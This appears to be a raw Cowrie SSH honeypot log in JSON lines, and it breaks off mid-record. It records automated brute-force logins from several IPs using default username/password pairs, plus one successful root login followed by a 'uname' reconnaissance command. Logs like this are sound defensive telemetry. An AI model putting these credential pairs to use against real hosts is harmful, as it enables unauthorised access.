{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:15:48.345670Z","src_ip":"45.125.211.194","session":"c0e764dc3073"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:15:49.180028Z","src_ip":"45.125.211.194","session":"c0e764dc3073"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:15:50.392195Z","src_ip":"45.125.211.194","session":"c0e764dc3073"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":56097,"dst_ip":"1.2.3.4","dst_port":22,"session":"c31bcced33bc","protocol":"ssh","message":"New connection: 45.125.211.194:56097 (1.2.3.4:22) [session: c31bcced33bc]","sensor":"my-vps","timestamp":"2025-08-28T03:16:03.136770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:16:03.146737Z","src_ip":"45.125.211.194","session":"c31bcced33bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:16:03.381426Z","src_ip":"45.125.211.194","session":"c31bcced33bc"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-28T03:16:04.245198Z","src_ip":"45.125.211.194","session":"c31bcced33bc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:05.468376Z","src_ip":"45.125.211.194","session":"c31bcced33bc"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":53374,"dst_ip":"1.2.3.4","dst_port":22,"session":"0363dc8ef7bc","protocol":"ssh","message":"New connection: 194.233.79.134:53374 (1.2.3.4:22) [session: 0363dc8ef7bc]","sensor":"my-vps","timestamp":"2025-08-28T03:16:15.026526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:16:15.431705Z","src_ip":"194.233.79.134","session":"0363dc8ef7bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:16:15.437288Z","src_ip":"194.233.79.134","session":"0363dc8ef7bc"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-28T03:16:17.095946Z","src_ip":"194.233.79.134","session":"0363dc8ef7bc"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":57958,"dst_ip":"1.2.3.4","dst_port":22,"session":"6439167e2512","protocol":"ssh","message":"New connection: 45.125.211.194:57958 (1.2.3.4:22) [session: 6439167e2512]","sensor":"my-vps","timestamp":"2025-08-28T03:16:18.037006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:16:18.043487Z","src_ip":"45.125.211.194","session":"6439167e2512"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:16:18.249626Z","src_ip":"45.125.211.194","session":"6439167e2512"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:18.610812Z","src_ip":"194.233.79.134","session":"0363dc8ef7bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:16:19.088675Z","src_ip":"45.125.211.194","session":"6439167e2512"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:16:19.537128Z","src_ip":"45.125.211.194","session":"6439167e2512"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:16:19.537796Z","src_ip":"45.125.211.194","session":"6439167e2512"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:19.755901Z","src_ip":"45.125.211.194","session":"6439167e2512"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:19.757099Z","src_ip":"45.125.211.194","session":"6439167e2512"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":40089,"dst_ip":"1.2.3.4","dst_port":22,"session":"4abf45f4b716","protocol":"ssh","message":"New connection: 45.125.211.194:40089 (1.2.3.4:22) [session: 4abf45f4b716]","sensor":"my-vps","timestamp":"2025-08-28T03:16:32.813253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:16:32.843059Z","src_ip":"45.125.211.194","session":"4abf45f4b716"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:16:33.025687Z","src_ip":"45.125.211.194","session":"4abf45f4b716"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T03:16:33.863993Z","src_ip":"45.125.211.194","session":"4abf45f4b716"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:35.075896Z","src_ip":"45.125.211.194","session":"4abf45f4b716"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46101,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4c9876bc45c","protocol":"ssh","message":"New connection: 212.227.235.229:46101 (1.2.3.4:22) [session: a4c9876bc45c]","sensor":"my-vps","timestamp":"2025-08-28T03:16:44.074148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:16:44.100406Z","src_ip":"212.227.235.229","session":"a4c9876bc45c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:16:44.196491Z","src_ip":"212.227.235.229","session":"a4c9876bc45c"}
{"eventid":"cowrie.login.failed","username":"link","password":"link123","message":"login attempt [link/link123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:16:44.694368Z","src_ip":"212.227.235.229","session":"a4c9876bc45c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:45.792774Z","src_ip":"212.227.235.229","session":"a4c9876bc45c"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":60228,"dst_ip":"1.2.3.4","dst_port":22,"session":"94160534034c","protocol":"ssh","message":"New connection: 45.125.211.194:60228 (1.2.3.4:22) [session: 94160534034c]","sensor":"my-vps","timestamp":"2025-08-28T03:16:47.512629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:16:47.518725Z","src_ip":"45.125.211.194","session":"94160534034c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:16:47.728224Z","src_ip":"45.125.211.194","session":"94160534034c"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T03:16:48.551512Z","src_ip":"45.125.211.194","session":"94160534034c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:49.761084Z","src_ip":"45.125.211.194","session":"94160534034c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57762,"dst_ip":"1.2.3.4","dst_port":22,"session":"17fe70776fbe","protocol":"ssh","message":"New connection: 212.227.125.160:57762 (1.2.3.4:22) [session: 17fe70776fbe]","sensor":"my-vps","timestamp":"2025-08-28T03:16:56.846733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:16:56.847667Z","src_ip":"212.227.125.160","session":"17fe70776fbe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:16:57.062388Z","src_ip":"212.227.125.160","session":"17fe70776fbe"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-28T03:16:57.723277Z","src_ip":"212.227.125.160","session":"17fe70776fbe"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:58.941262Z","src_ip":"212.227.125.160","session":"17fe70776fbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40414,"dst_ip":"1.2.3.4","dst_port":22,"session":"2633b18273fe","protocol":"ssh","message":"New connection: 212.227.235.229:40414 (1.2.3.4:22) [session: 2633b18273fe]","sensor":"my-vps","timestamp":"2025-08-28T03:16:59.625854Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:16:59.627157Z","src_ip":"212.227.235.229","session":"2633b18273fe"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":26491,"dst_ip":"1.2.3.4","dst_port":22,"session":"42fda030d1d2","protocol":"ssh","message":"New connection: 45.125.211.194:26491 (1.2.3.4:22) [session: 42fda030d1d2]","sensor":"my-vps","timestamp":"2025-08-28T03:17:02.413247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:02.430550Z","src_ip":"45.125.211.194","session":"42fda030d1d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:02.634990Z","src_ip":"45.125.211.194","session":"42fda030d1d2"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:03.466002Z","src_ip":"45.125.211.194","session":"42fda030d1d2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:04.677908Z","src_ip":"45.125.211.194","session":"42fda030d1d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33060,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fbe5f71ee53","protocol":"ssh","message":"New connection: 212.227.235.229:33060 (1.2.3.4:22) [session: 8fbe5f71ee53]","sensor":"my-vps","timestamp":"2025-08-28T03:17:11.167839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:11.168896Z","src_ip":"212.227.235.229","session":"8fbe5f71ee53"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","a